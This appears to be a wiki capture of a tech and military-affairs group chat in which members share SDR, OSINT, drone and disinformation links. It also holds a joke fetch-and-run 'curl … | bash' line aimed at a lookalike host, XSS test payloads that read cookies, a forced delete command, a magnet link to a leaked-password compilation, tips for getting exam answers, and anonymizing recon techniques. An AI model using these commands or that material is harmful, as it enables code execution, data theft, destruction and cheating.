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| '' '''@jumson:irregularchat.com:''' > <@jumson:irregularchat.com> So, want me to throw everything there from now on?
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| !capture - '''Jon Last name (optional):''' ''(signal)'' !capture - '''Austyn:''' ''(signal)'' Shameless self-promotion: check out my blog post if your interested in looking through that FCC report to start reverse engineering the signal: akrutsinger.github.io - '''Gatormaxx:''' ''(signal)'' https://www.techradar.com/pro/revolutionary-wi-fi-tech-that-can-cover-two-miles-and-work-on-coin-batteries-for-months-hits-key-milestone-halow-gets-first-hardware-after-an-eight-year-of-wait-but-rivals-abound
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| Eight years on, and it seems the technology is finally reaching fruition after Morse Micro, recently demonstrated the world’s first live application of Wi-Fi HaLow, 802.11ah with a 3-kilometer reach, setting a record for a long-range video call that extended almost two miles.
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| HaLow is a low-power, long-reach version of Wi-Fi based on the IEEE 802.11ah standard. It operates in the sub-GHz range (850-950 MHz) which allows it to penetrate obstacles, walls and buildings, and lets it connect larger numbers of IoT devices at much longer distances and using far lower power. This equates to an impressive 10x the range, 100x the coverage area, and 1000x the volume of traditional Wi-Fi technologies. - '''Jon Last name (optional):''' ''(signal)'' hello whitebox device - '''Chris Cummins:''' ''(signal)'' Nope.
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| Tested this though.
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| https://arstechnica.com/gadgets/2023/07/light-based-lifi-promises-amazing-wireless-speeds-just-not-through-walls/
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| Implantation suggestions:
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| A lot of future potential, just still too expensive for implementation at this time. - '''Mason:''' ''(signal)'' [[1_vtbnqns62zczfzkzuj.jpeg]] - '''Matt G:''' ''(signal)'' [[w92gluo6rlfckr7lvxdw.jpeg]] - '''@jumson:irregularchat.com:''' Not captured…. wasn’t in database, need to put some kind of response in there - '''Aneesh:''' ''(signal)''
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| <pre>$ sudo cpupower frequency-set 400Mhz</pre>
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| Or whatever slow speed when not needing the wattage.
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| Great tool to manage power. It’s fun to find the sweet spot to optimize when doing RF stuff or even anything else when on battery or whatever. Not quite “dragonos” related, but can be useful heh. - '''@jumson:irregularchat.com:''' https://blog.koehntopp.info/2024/02/13/the-matrix-trashfire.html - '''Ray:''' ''(signal)'' JOB FAIR - '''Ray:''' ''(signal)'' [[j3dvtyf1x4fgsvghkmfb.jpg]] - '''S.A.C:''' ''(signal)'' Attached is this week’s edition of the Ghost Post. Highlights include:
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| Mick Ryan and Clint Hinote, “Uncrewed Systems and the Transformation of the U.S. Warfighting Capacity,” War on the Rocks, February 9, 2024, https://warontherocks.com/2024/02/uncrewed-systems-and-the-transformation-of-u-s-warfighting-capacity/.
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| Nina Jankowicz, “The Coming Flood of Disinformation,” Foreign Affairs, February 7, 2024, https://www.foreignaffairs.com/united-states/coming-flood-disinformation.
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| You-Hao Lai, “Disinformation and Civil Defence: How did Taiwan’s Civil Society Counter Foreign Information Manipulation?” Taiwan Insight at University of Nottingham, last modified February 5, 2024, https://taiwaninsight.org/2024/02/05/disinformation-and-civil-defence-how-did-taiwans-civil-society-counter-foreign-information-manipulation/.
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| Karolina Hurd, The Kremlin’s Occupation Playbook: Coerced Russification and Ethnic Cleansing in Occupied Ukraine, (Washington D.C.: Institute for the Study of War, January 2024), https://www.understandingwar.org/sites/default/files/24-210-01%20ISW%20Occupation%20playbook.pdf.
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| From our own this week, we have two great pieces from Jas Logue and Tom Kent:
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| Jason Logue, “Information – the Missing Member of the Military Power Quartet,” The Forge (Australia), last modified February 6, 2024, https://theforge.defence.gov.au/article/information-missing-member-military-power-quartet.
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| Thomas Kent, “Reaching Believers: The Truth Shall Make You Free,” Center for European Policy Analysis, last modified February 7, 2024, https://cepa.org/article/reaching-believers-the-truth-shall-make-you-free/. - '''S.A.C:''' ''(signal)'' [[qn5g_ujysby5kn0u7qtj.jpg]] - '''Graves:''' ''(signal)'' Tbe rest of the caption for reference - '''Graves:''' ''(signal)'' [[lrewg_c48egch0c6bh2s.jpg]]
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| '' '''Aneesh:''' ''(signal)'' TI has some great resources on proven antenna PCB design to literally replicate.
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| https://www.ti.com/lit/pdf/swra351
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| That’s just one of many docs.
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| I made quite a few in KiCAD over beers/TV
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| '' '''S.A.C:''' ''(signal)'' You gotta reply to what you want captured
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| '' '''B:''' ''(signal)'' Attached is this week’s edition of the Ghost Post. Highlights include:
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| Joel Simon, “Avoiding the Disinformation Trap,” New Yorker, February 12, 2024, https://www.newyorker.com/news/daily-comment/avoiding-the-disinformation-trap.
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| U.S. Department of State, “The Kremlin’s Efforts to Spread Deadly Disinformation in Africa,” press release, last modified February 12, 2024, https://www.state.gov/the-kremlins-efforts-to-spread-deadly-disinformation-in-africa/.
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| Renee DiResta, “Disinformation: A Back Pocket Guide,” Lawfare, last modified February 16, 2024, https://www.lawfaremedia.org/article/disinformation-a-back-pocket-guide.
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| Henryk Szadziewski, Graeme Smith, Daria Impiombato and Tarcisius Kabutaulaka, “How PRC companies influence diplomatic switches from Taiwan in the Pacific,” Australian Strategic Policy Institute’s the Strategist, last modified February 13, 2024, https://www.aspistrategist.org.au/how-prc-companies-influence-diplomatic-switches-from-taiwan-in-the-pacific/.
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| From our own this week, we have two pieces. First, from Brian Hamel, his piece on the Army webpage:
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| Brian Hamel, “Supporting Warfare in the Indo-Pacific Through Space-Based Sustainment,” U.S. Army, last modified February 1, 2024, https://www.army.mil/article/272928/supporting_warfare_in_the_indo_pacific_through_space_based_sustainment.
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| Next, from John Bicknell (who coincidentally celebrated a birthday today—happy birthday John!), we have the latest from the Cognitive Crucible:
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| Julie Janson, “#183 Julie Janson on Air Force IO Talent and Strategy,” February 13, 2024, in the Cognitive Crucible, hosted by John Bicknell, podcast, MP3 audio, 44:43, https://information-professionals.org/episode/cognitive-crucible-episode-183/. - '''Aneesh:''' ''(signal)'' Agent CyberBuffalo391, FBI:
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| <pre>C:\cool_filez> del ''.'' /f /s /q</pre>
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| “Nothing to see here. Mission complete. Move along.” - '''Jon Last name (optional):''' ''(signal)'' Test
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| <script>alert('ok');</script>
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| Ok - '''Adam:''' ''(signal)'' curl http://youtub.com/nothax.sh | bash -s - '''Jon Last name (optional):''' ''(signal)'' Test2
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| <script>
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| Ok, done. - '''Jon Last name (optional):''' ''(signal)'' Testing injection
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| I suspect for socom it may be a different person, but these people will know them - '''Jon Last name (optional):''' ''(signal)'' Test
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| <script>document.write('Cookies: ' + document.cookie);</script>
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| Encoded with HTML Entities:
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| <syntaxhighlight lang="html"><script>document.write('Cookies: ' + document.cookie);</script></syntaxhighlight>
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| '' '''F K:''' ''(signal)'' https://ipostal1.com/mail-forwarding-service.php
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| '' '''Piotr:''' ''(signal)'' https://youtu.be/qW77hVqux10?si=c6t5sn28m8X157D3
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| '' '''John “2PAC”:''' ''(signal)'' Login to Percipio > search for test bank you want (I.e. Sybex A+) > goto Wiley.com/go/sybextestprep > navigate to book you found in Percipio > use Percipio book to generate an answer to the question on Wiley > ??? > profit
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| '' '''John “2PAC”:''' ''(signal)'' https://customer.wiley.com/CGI-BIN/lansaweb?procfun+shopcart4+SH4FN19+funcparms+PARMKEYG%28A0060%29:SYBEX
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| '' '''Dan.:''' ''(signal)'' https://www.perplexity.ai/search/if-I-want-oTn4ZnbQT6.ZErk76ugVmA?s=m#a139f866-76d0-4faf-9912-b93beae81598
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| Vs perplexity - '''Dan.:''' ''(signal)'' [[8dw_iytli_y9m1gfuf72.jpg]] - '''Adam:''' ''(signal)'' [[abmc45n8f32bz8tmqn3f.pdf]] - '''Corey:''' ''(signal)'' Found a neat little piece of software that might come in handy its called “virtual here” you can stream usb devices over ip. - '''@sac:irregularchat.com:''' https://github.com/irregularchat/onboarding-bot/blob/main/onboarding.py - '''lito:''' ''(signal)'' https://www.vermilionchina.com/p/tactical-lessons-from-ukraine
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| '' '''Fletcher Goldsby Hall:''' ''(signal)'' [[kdvloajimyrcryxlq4am.pdf]]
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| '' '''Fletcher Goldsby Hall:''' ''(signal)'' Comms survivability onion: Don’t communicate Don’t be detected Don’t be type-ID’d Don’t be geolocated Don’t be exploited (COMINT internals)
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| '' '''Fletcher Goldsby Hall:''' ''(signal)'' Correlates with Horizontal comms PACE plan LPD WRM (?) LPG LPE
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| But as previously discussed, “LPX” is meaningless bullshit, and WRM might be a trap. - '''Fletcher Goldsby Hall:''' ''(signal)'' [[3m6o7jcp4ad6bmrhvdrv.pdf]] - '''winterj1088:''' ''(signal)'' https://youtu.be/BYyE_IOGtJI?si=1-V-6iA4pXFNiYgk - '''-ng:''' ''(signal)'' Existing Installs: If you already have an existing Kali Linux installation, remember you can always do a quick update:
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| ┌──(kali㉿kali)-[~] └─$ echo “deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware” | sudo tee /etc/apt/sources.list […]
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| ┌──(kali㉿kali)-[~] └─$ sudo apt update && sudo apt -y full-upgrade […]
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| ┌──(kali㉿kali)-[~] └─$ cp -vrbi /etc/skel/. ~/ […]
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| ┌──(kali㉿kali)-[~] └─$ [ -f /var/run/reboot-required ] && sudo reboot -f You should now be on Kali Linux 2024.1 We can do a quick check by doing:
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| ┌──(kali㉿kali)-[~] └─$ grep VERSION /etc/os-release VERSION=“2024.1” VERSION_ID=“2024.1” VERSION_CODENAME=“kali-rolling”
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| ┌──(kali㉿kali)-[~] └─$ uname -v #1 SMP PREEMPT_DYNAMIC Kali 6.6.9-1kali1 (2024-01-08)
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| ┌──(kali㉿kali)-[~] └─$ uname -r 6.6.9-amd64 - '''S.A.C:''' ''(signal)'' Anyone managing a Twitter account. This is how to prevent ip exposure if you leave Twitter calls enabled.
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| Settings -> Privacy & Safety -> Direct Messages -> Enhanced Call Privacy
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| https://twitter.com/YUNGJEFF/status/1763612664582783204 - '''S.A.C:''' ''(signal)'' Good breakdown of pig slaughtering scams going on.
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| Chinese gangs trafficking people to use personas to target Americans
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| https://youtu.be/pLPpl2ISKTg?feature=shared - '''lito:''' ''(signal)'' This is the best presentation I’ve ever seen that describes exactly how selling to the DoD is like for businesses. Even as someone from the military, I wish I understood this process when I first started so I didn’t get led astray. It’s made by an acquaintance of mine. Hope it helps - '''lito:''' ''(signal)'' [[oc4qgfk0acbfc2fz1b5-.pdf]] - '''Dominik:''' ''(signal)'' I think I need to setup a python script on desktop to continously download all these convos, links, memes, chats, etc. hotdang, I go to the gulag for 8hrs and come out to 78 msgs - '''Fletcher Goldsby Hall:''' ''(signal)'' https://inteldocs.intelink.gov/files/details/1a23812d-903e-466f-98a3-c3f92f49693c
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| Inteldocs link to a mega .zip file with a TON of .STLs for IADS weapons control nodes.
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| Someone that is a responsible adult, please bump to chat, and/or !WHATEVER for posterity - '''Dominik:''' ''(signal)'' easy money bruv…
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| = https://www.fcc.gov/wireless/support/knowledge-base/universal-licensing-system-uls-resources/getting-fcc-registration =
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| = Once You have an FRN number, save it as you’ll need it to take the FCC Technician exam remotely =
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| = Download & Buy the HamStudy app for $5 (supports the examiners and app dev who is a ham operator) https://www.hamstudy.org =
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| = Use app to study for the Technician Exam (this should take you no more then 3-5 days) =
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| = Go to https://hamstudy.org/sessions/remote =
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| '' find a LIVE remote test session which fits yerr schedule, pay $15 for test, pass within 48-72hrs get your FCC Technician callsign
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| <ol start="6" style="list-style-type: decimal;">
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| <li>With callsign go to Ham Radio Outlet and buy the best amateur HT: YAESU FT5D</li></ol>
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| '' '''Dominik:''' ''(signal)'' [[tvics9y8nhcrvdbnrf7-.jpeg]]
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| '' '''Dominik:''' ''(signal)'' [[anchoxdloxvngjxrh3d5.jpeg]]
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| '' '''Dominik:''' ''(signal)'' [[a5vqmmsc6zsovdp5fgx_.jpeg]]
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| '' '''A B:''' ''(signal)'' Their greatest issues were simply not having the numbers to tie into a partner force effectively, not having the language skills to overcome inherent barriers in direct liaising, and lacking the staff functions that a partner force division/bde would actually need to tie into a US Div.
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| They’re designed around competition which is a great capability we need. The transition from competition to conflict is incredibly dangerous for them though.
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| I’ll try to get their AAR from the OC team that had them. The CTCs had real issues with generating enough problems for a DIV staff, DIVARTY, an SF company, SFAB, and adjacent marines. Ghost team was giving everyone hell though. - '''T.S. Allen:''' ''(signal)'' Great piece on UAS capabilities and limitations by Stacie Pettyjohn: “Drones have indeed transformed the battlefield in Ukraine by providing accessible and affordable capabilities at a scale that did not previously exist. They are making it difficult to concentrate forces, achieve surprise, and conduct offensive operations. While drones are not more survivable than crewed aircraft, they enable greater risk acceptance. Moreover, drones do not have to be survivable if they are cheap and plentiful as they can achieve resiliency by reconstitution. Nevertheless, the overall impact of drones has been more evolutionary than revolutionary. Drones connected to ground-based fires units have made common artillery shells precision weapons. First-person-view kamikaze drones can accurately hit mobile targets, making the frontlines even more lethal. Nevertheless, even large numbers of small drones cannot match the potency or volume of artillery fire and thus cannot substitute for howitzers. Also, while drones provide affordable airpower, they have not replaced traditional air forces, nor have they been able to obtain air superiority… The frontlines in Ukraine are not impenetrable or completely transparent, but drones are forcing troops to disperse and conceal themselves, which has overall made it harder to maneuver and attack… Instead as Mick Ryan and Clint Hinote have argued it is the combination of large numbers of weapons systems linked together that is truly disruptive. In Ukraine, the dominant pairing has been unarmed drones and artillery…” My one critique is her framing is useless because changes in the character of war are always evolutionary. https://warontherocks.com/2024/03/drones-are-transforming-the-battlefield-in-ukraine-but-in-an-evolutionary-fashion/ - '''Tommy D:''' ''(signal)'' FYSA ARCYBER- Gabriel Nimbus Developer and System Administrator courses are restarting for FY 24. They have a really cool AWS centric tech stack and the courses start at beginner progressing to developer. Probably worth checking out current cyber focused apps for you SOF Cyber folks in this chat. Find descriptions on the army teams channel here https://dod.teams.microsoft.us/l/channel/19%3adod%3a2324c5a2b67f4da4866dd09494eb483d%40thread.skype/General?groupId=89805dea-cb01-4179-a81e-40a758459c9a&tenantId=fae6d70f-954b-4811-92b6-0530d6f84c43 - '''Jon Last name (optional):''' ''(signal)'' [[xufi0h3768mlvsnsajiz.png]] - '''S.A.C:''' ''(signal)'' !capture - '''Joel:''' ''(signal)'' !capture - '''Stu:''' ''(signal)'' There is another project that offers an approach to drone stuff to TAK.
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| https://github.com/snstac/aryaos
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| I haven’t tried it but Greg has put out some quality stuff.
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| That said I am not opposed to trying.
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| '' '''Bryan:''' ''(signal)'' https://www.kodachi.solutions/osint
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| '' '''Jon Last name (optional):''' ''(signal)'' These are always interesting. Not intended to spark domestic politics discussion. Just interesting
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| '' '''Greg Albrecht:''' ''(signal)'' Oh, I guess pelican publishes 3d models as well: https://www.pelican.com/us/en/professional/cad-downloads/
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| '' '''Greg Albrecht:''' ''(signal)'' Unfortunately the RugCase R'' series aren’t up there yet, fear not: https://www.printables.com/model/227921-blank-pelican-r40-insert/files
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| '' '''Dominik:''' ''(signal)'' https://unsigned.io
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| Anonymous, decentralized, long-range comms w/o internet - '''Fletcher Goldsby Hall:''' ''(signal)'' Courtesy of ,
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| '' '''Jon Last name (optional):''' ''(signal)'' https://pysdr.org/
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| This looks like a great resource, just found it. Explains a lot of the theory as well as practical examples for interacting - '''Jon Last name (optional):''' ''(signal)'' [[gnykoqorsgzshf86dje7.png]] - '''Jon Last name (optional):''' ''(signal)'' https://pysdr.org/
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| This looks like a great resource, just found it. Explains a lot of the theory as well as practical examples for interacting - '''Jon Last name (optional):''' ''(signal)'' [[gnykoqorsgzshf86dje7.png]] - '''Kate Jones:''' ''(signal)'' Back when people wrote letters they had a wonderful way to brief and capture their thoughts and observations.
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| Letter writing is a lost art.
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| Bell wrote over 2000 letters. Magnificent work.
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| Letter were the only way my mother kept contact with her relatives in Ireland, people she and her mother who jumped on a ship and ran away at 14 would likely never see in person. And yet they kept strong bonds and there are stacks of their history somewhere in a closet of relationships by letter that were deeply meaningful and sources of joy, without any personal contact.
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| Now folks struggle with a couple lines of text. Or if we do communicate like here, with meaning, it is hard to retrieve. - '''Dominik:''' ''(signal)'' https://www.aresvalley.com/artemis
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| ARTEMIS Mk.III
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| RF Signals Recognition Manual - '''Dominik:''' ''(signal)'' https://aprs.fi
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| Worldwide real-time tracking of all APRS emitters - '''Gatormaxx:''' ''(signal)'' https://x.com/WBG_Agriculture/status/1712204730628202877?t=tAvQLCilMXlT9m9WTEkn-g&s=09
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| This could be useful for PMESII-PT - '''A B:''' ''(signal)'' https://www.fao.org/worldfoodsituation/en
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| The cereal supply demand brief is a mostly'' monthly publication on global cereal markets that are the driver of economic related famines. When crisis breaks out like the Sudan or Gaza they publish independent reports.
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| https://www.fao.org/newsroom/detail/projected-famine-in-gaza–fao-urges-immediate-access-to-deliver-urgent-and-critical-assistance-at-scale/en
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| Their most recent Gaza report is startling.
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| '' '''S.A.C:''' ''(signal)'' Does today’s event have a wiki page yet. Wonder if these pages will be linked
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| '' '''Aneesh:''' ''(signal)'' Surprised it took them so long.
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| https://files.ettus.com/schematics/ - '''S.A.C:''' ''(signal)'' Ya I agree - '''F K:''' ''(signal)'' https://www.bakerinstitute.org/open-source-mapping-chinas-energy-infrastructure
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| More current - '''Dominik:''' ''(signal)'' OSINT Newsletter - GITHUB OSINT (50 pages) - '''Dominik:''' ''(signal)'' [[cidn_dsc4dc_ysvxks_0.pdf]] - '''Dominik:''' ''(signal)'' MITRE Engenuity Launches UAS TRAINING for PUBLIC SAFETY - '''Dominik:''' ''(signal)'' [[eidud_qpp2ge3syfrrmg.pdf]] - '''Dominik:''' ''(signal)'' MITRE Engenuity Launches UAS TRAINING for PUBLIC SAFETY - '''Dominik:''' ''(signal)'' [[eidud_qpp2ge3syfrrmg.pdf]] - '''Dominik:''' ''(signal)'' https://www.rtl-sdr.com/wardragon-running-krakensdr-to-tak-python-and-federeate-tak-server - '''JL:''' ''(signal)'' https://www.crystalknows.com/
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| ^everyone found this? Chrome plug-in that uses LinkedIn data to conduct personality assessments - '''F K:''' ''(signal)'' https://www.army.mil/socialmedia/personal/ - '''Aneesh:''' ''(signal)'' Interesting.
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| https://github.com/cnlohr/lolra/tree/master - '''Fletcher Goldsby Hall:''' ''(signal)'' On behalf of HOTAS Patten, for Irregular Chat’s being pleasure - '''Fletcher Goldsby Hall:''' ''(signal)'' [[rb7bq5npzicmcgcy-laj.pdf]] - '''Jon Last name (optional):''' ''(signal)'' #this_is_a_test - '''Matt Miller:''' ''(signal)'' https://github.com/user1342/Monocle
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| '' '''lito:''' ''(signal)'' “If you want to measure the level of corruption in your company look at the cars the subcontractors are driving”
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| '' '''josh_c:''' ''(signal)'' Interactive Mindmap of Social Engineering and Persuasion Books (https://www.doingfedtime.com/interactive-mindmap-of-social-engineering-and-persuasion-books/) This is pretty cool
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| '' '''Joe:''' ''(signal)'' Fun little technique with THC’s segfault root servers https://www.thc.org/segfault/:
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| = Spin up your vpn of choice ( i use CF warp ) =
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| = Use startpage to search for shell.segfault.net or https://www.startpage.com/do/search?q=https%3A%2F%2Fshell.segfault.net%2F& =
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| = Click the little mask icon next to the result (see 1st pic), you will enter an anonymous view by stargepage window, basically a proxy in a browser. =
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| = This drops you into segfault’s browser shell. Segfault has little root containers for you to do your thing in. Start a new root server. This use to be better back in the day, now you have to wait 60 sec to start up a container. You can go through the token process if you want a bit better functionality. =
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| = Second photo is the result. My workstation IP is the proxy IP from startpage…that I’m connecting to via my CF warp vpn. Segfault has it’s own exit routing as well from its box. =
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| = ??? =
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| = Profit =
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| Risk here is obviously startpage viewing what you are doing, you can cut that part out if you want but you lose a hop. You can also just replace it with any other browser proxy service. However the original technqieu requires 0 infra stand up of your own and gets you multiple hops pretty quick.
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| If you haven’t seen segfault before, its from the hackers choice guys.
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| They’ve got a really good tips/tricks guide: https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/README.md#https
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| If you want to stand up your own segfault server cluster service: https://github.com/hackerschoice/segfault/wiki
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| Generally tons of great into/resources that they have.
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| I use to know where their blog was on how they secured their root servers but they moved it or something. - '''Joe:''' ''(signal)'' [[uytooyuhnwgdt21omkq3.png]] - '''Joe:''' ''(signal)'' [[hk-w2gzx_bwhjx_7yetb.png]] - '''Aneesh:''' ''(signal)'' in Linux, one can use wpa_supplicant configurations to tease that.
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| https://w1.fi/cgit/hostap/plain/wpa_supplicant/README - '''Joe:''' ''(signal)'' Some light reading for this morning on some recon stuff.
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| go to https://dnsdumpster.com
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| as an example, type in untitledstartup.com (pic1)
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| many times you will find a host that’s being proxied with cloudfront/cloudflare and you don’t get the real IP, but sometimes there will be a mail server or something that can’t be proxied and you can find its real ip. here we get both, as well as see a proxied service (jitsi)
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| drop the IP into your choice of SE (shodan/netlass/censys), get more info, etc (pic 2 & 3) - '''Joe:''' ''(signal)'' [[0awsdgflo4rdahti_tti.png]] - '''Joe:''' ''(signal)'' [[t71xmclooowxdhclyhsa.png]] - '''Joe:''' ''(signal)'' [[hcbreixmrm4ood4kkx6t.png]] - '''Matt Miller:''' ''(signal)'' https://explainshell.com/ - '''Nick:''' ''(signal)'' When checking into a hotel, it becomes crucial to protect personal information by understanding your status, follow either a personal or organizational profile for your digital travelers safety and maintain a sound a secure state-of-data posture ( data-at-rest; data-in-transit; data-in-use; and data retention)
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| Goals: stay ahead of the curve by mitigating 5 general threat vectors:
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| Visual & physical Electronic signals & signature Online access and activity Financial information Travel process
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| Here are some general tips for the application of safe digital practices while traveling and checking into hotel rooms:
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| Note: Determine threat model based on status in the host country, depending on the environment status ( permissive / semi permissive ) and based on the country it self. Easiest to assume you are being monitored at all times.
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| = Use Secure Networks: Avoid using public Wi-Fi for all activities like accessing bank accounts or entering personal information. Use a virtual private network (VPN) to obfuscate internet connection, making it more secure against casual digital surveillance. =
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| = Verify Wi-Fi Networks: Threat Actors often create Wi-Fi networks that mimic legitimate hotel networks to steal data. Always verify the exact name and password of the hotel’s Wi-Fi network with the front desk before connecting. (Use rogue cell scanning tools if you have it) =
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| = Device Security: Ensure that all devices are password protected, drives are all encrypted and that security features (I.e fingerprint or facial recognition) are enabled. Keep your devices updated with the latest security patches and antivirus software and never download updates pushed by local cell service. Verify updates and download locally to install offline after validation( depending on phone ) =
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| = Use Credit Over Debit: When making any deposits or payments at the hotel, use a credit card instead of a debit card. Credit cards often offer better fraud protection and limit your liability in the event of unauthorized transactions. =
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| = Limit =
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| '' '''Nick:''' ''(signal)'' [[luk_x8le6vvhp8acn1pp.txt]]
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| '' '''Graves:''' ''(signal)'' https://www.futuretools.io/?tags-n5zn=ai-detection&pricing-model=free%7Cgoogle-colab%7Cfreemium
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| '' '''Graves:''' ''(signal)'' Ha… nice…
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| '' '''Graves:''' ''(signal)'' [[_x5ajk3flgmmzuulnhkr.jpg]]
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| '' '''Nick:''' ''(signal)'' This may work for that reason https://satellitemap.space/
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| '' '''Benton Liu:''' ''(signal)'' On the leak section, a section regarding blackmail or extortion can be added. If information is being used against the victim, then the victim will need to choose a path to either expose the information first to the parties that the threat actor may expose to that is being held against the victim as that disarms the threat actor or some other path.
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| '' '''winterj1088:''' ''(signal)'' Vote for whoever you want
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| Cool I’m voting for third party
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| Why waste your vote ?
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| Trying to show that we can get away from the two party system . And I hate the two mainstream parties
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| Well it’s a waste and it’s a vote against my candidate
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| No it’s a vote against both candidates
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| Okay you are a typical (insert libtard / maga racist depending on who you are talking to)
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| No I just want my gay neighbors to be able to protect their marijuana fields with their ar 15s and worship their pagan gods and just be quiet after 9pm on the weekdays and 11 pm on the weekends and invite me to their bbq .
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| Ok fascist - '''Gatormaxx:''' ''(signal)'' Understanding engineers:
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| PERCUSSIVE MAINTENANCE - I hit it and it started working
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| HIGH IMPEDANCE AIR GAP - I forgot to plug it in
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| ORGANIC GROUNDING - I got electrocuted
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| KINETIC DISASSEMBLY - it blew up
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| THERMAL SHOCK - it burned
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| THERMALLY RECONFIGURED - it melted - '''Joel:''' ''(signal)'' This? - '''Joel:''' ''(signal)'' [[setghqyqz7ueg1vspgxi.pdf]] - '''Graves:''' ''(signal)'' !capture - '''OB1K🚫🐝:''' ''(signal)'' [[vsqzcdsz3kh7wu-bovrm.pdf]] - '''OB1K🚫🐝:''' ''(signal)'' [[lsgl2og3_0zfnlyxwadb.pdf]] - '''OB1K🚫🐝:''' ''(signal)'' Hm. - '''S.A.C:''' ''(signal)'' yea ! it hit - '''S.A.C:''' ''(signal)'' 🚀 Welcome to the Tech Chat! 🚀
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| As you join us, please take a moment to browse the user list and introduce yourself. We’re excited to learn about your tech training, interests, and projects. This is a great opportunity to self-promote and share your tech projects or ask a question to the community.
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| '' Resources for Learning: Check out some fantastic resources shared within our group at https://wiki.irregularchat.com/learning/.
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| '' For sharing up to Controlled Unclassified Information (CUI), head over to https://url.irregular.chat/msuite
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| '' Unique Invite: You’ll receive a unique invite link to the Irregular Chat Login via DM shortly.
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| Expectation Management: This group fosters a focused environment for general tech discussions. We strive to keep our conversations relevant and productive, ensuring every member gains value from their time here. Off-topic banter is directed to our Off-Topic Chat—http://url.irregular.chat/go-off-topic/ where you can freely share and enjoy less technical content. This approach helps us maintain the quality and relevance of discussions for everyone’s benefit.
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| Thank you for joining us, and we look forward to your contributions! - '''John Sternitzky:''' ''(signal)'' https://github.com/cs2000/DankDroneDownloader
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| Let’s start jail breaking DJI in mass - '''Nick:''' ''(signal)'' Latest NSA mobile device security report focusing on phones 📱 - '''Nick:''' ''(signal)'' [[3pxswropfb8bxpt94bx_.pdf]] - '''S.A.C:''' ''(signal)'' Be a cyber warrant or officer
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| Someone ask for a letter of recommendation to follow your footsteps to be a cyber officer or warrant.
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| What do you look for or ask said youngling ? Do you have a recommendation philosophy? - '''lito:''' ''(signal)'' The government doesn’t want you to know ps -ep Bypass on your privileged accnt after getting 8570.1M certs through looking at comptia question banks on the internet - '''Matt O.:''' ''(signal)'' Log into comptia > schedule a test > update info > goes to find page - '''Matt O.:''' ''(signal)'' [[xkt4std1gi8ogjvcb6lo.jpg]] - '''Piotr:''' ''(signal)'' Ukraine has the world’s first naval drone armed with anti-aircraft missiles. The ship is armed with two R-73 (AA-11 Archer) missiles. This should allow it to engage aircraft at ranges of up to 15 km, although actual engagements may be shorter. Unmanned surface vessels (USVs) are vulnerable to aircraft. So the Russian defense has focused on using helicopters and fighter jets to stop them, but now there is an additional threat. In fact, this is the world’s first such naval drone with air defense systems. Manufacturers in other countries have studied the possibility of giving US drones some kind of air defense capabilities. But this system is the first to be used in combat conditions. Missiles from BEKs pose a real threat to aircraft. The R-73 missile is a Soviet-era short-range air-to-air missile carried by the MiG-29 and Su-27. Launching from the surface reduces the range. The detection system for optical-electronic devices of ships becomes a limitation in effectiveness. Meanwhile, the first group of Ukrainian F-16 pilots trained in Arizona has completed training. It is expected that the first flights will begin in Ukraine closer to autumn. So there is every reason to assume that the enemy intends to use combined tactics against our aviation in coastal areas. And we have a couple of ideas on how to beat them in this scenario. - '''Piotr:''' ''(signal)'' [[3spjitxvli6iwgtqfbed.jpg]] - '''Piotr:''' ''(signal)''  chapter 19 - '''Piotr:''' ''(signal)'' [[lni_lqlzq39h0fxjlobq.pdf]] - '''F K:''' ''(signal)'' https://github.com/markqvist/Sideband - '''Mason:''' ''(signal)'' [[kciw6yz3qr2cwudnzadf.jpg]] - '''K:''' ''(signal)'' The best time to opt out is before you give them your data. Somewhere in these many chats I gave ideas and examples of templates/formats for getting data removed and opting out of future data collection. I’m guessing they’re long gone with the disappearing messages, but they may have been captured in the wiki. - '''Adam:''' ''(signal)'' Just take comfort in the fact that nobody would waste their valuable 0 day zero click on anybody in this chat - '''Joe:''' ''(signal)'' I mention them, shodan, censys, netlas, dnsdumpster, and etc < the best one. - '''Piotr:''' ''(signal)'' [[pkqs7_30l4wzt30ocbwb.pdf]] - '''lito:''' ''(signal)'' All teams videos, data, and pitch decks:
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| https://drive.google.com/drive/mobile/folders/1xGbJnCSq8M5VGpwNMp9G_9Ye7lsIbFr- - '''K:''' ''(signal)'' magnet:?xt=urn:btih:4e3915a8ecf6bc174687533d93975b1ff0bde38a&dn=rockyou2024.zip&tr=udp://tracker.openbittorrent.com:80&tr=udp://tracker.opentrackr.org:1337/announce - '''S.A.C:''' ''(signal)'' Which part - '''JR:''' ''(signal)'' GI Bill pro tip. Guy I know just told me about this and is doing it.
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| You get E5 BAH based on where the school is. There’s a school in Seattle where thurs-sun once a quarter is in person, and the rest of the time is online. He lives in FL. Once a quarter, flies to Seattle for the class. The extra BAH more than covers the cost of the flight. - '''John “2PAC”:''' ''(signal)'' BLUF: The DoD SkillBridge program is changing.
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| The changes occurring and outlined below directly affect the companies that provide SkillBridge services and do not necessarily affect service members directly nor the process to apply for SkillBridge, but rather provide clarity for why a SkillBridge provider of your choice may or may not be on your list of companies to work for in your post-military life. Fully online programs which provided certifications or job skills have historically been the most popular programs on Vandenberg SFB, and due to these changes, those programs will no longer be allowed. The following changes went into effect on 15 Jul 24 and are effective for anyone starting their SkillBridge 1 Oct 24 or later. Companies must now meet the below minimum requirements to become SkillBridge providers:
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| = Applications from companies to become a SkillBridge Provider will only be accepted by DoD during structured window of 1 Oct - 1 Dec and 1 Feb - 1 Apr each year and will be renewed annually. This means if you have a company not on the already approved listing at DoD SkillBridge Program (osd.mil), that company must wait until the next SkillBridge window of 1 Oct - 1 Dec or 1 Feb - 1 Apr to be considered as a SkillBridge provider; meaning they will not be able to accept any SkillBridge applications from service members until they apply during the window and are approved by DoD. Anyone considering a company that is not already on the approved DoD SkillBridge list should consider talking with that company ahead of time. =
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| = Effective 15 Jul 24 all current MOUs in the SkillBridge Program must sign a new agreement with the following requirements: All providers must be an established business with a minimum of 3 years in operation. All providers must offer positions to participants with an annual salary of (no less than) $52k annually or $25/hour for full-time work. All providers must have a hybrid training program that requires at least one (8 hours) of face-to-face training per week at company locatio =
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| * '''John “2PAC”:''' ''(signal)'' [[hcq4hgacf4b-ubow5x4x.txt]]
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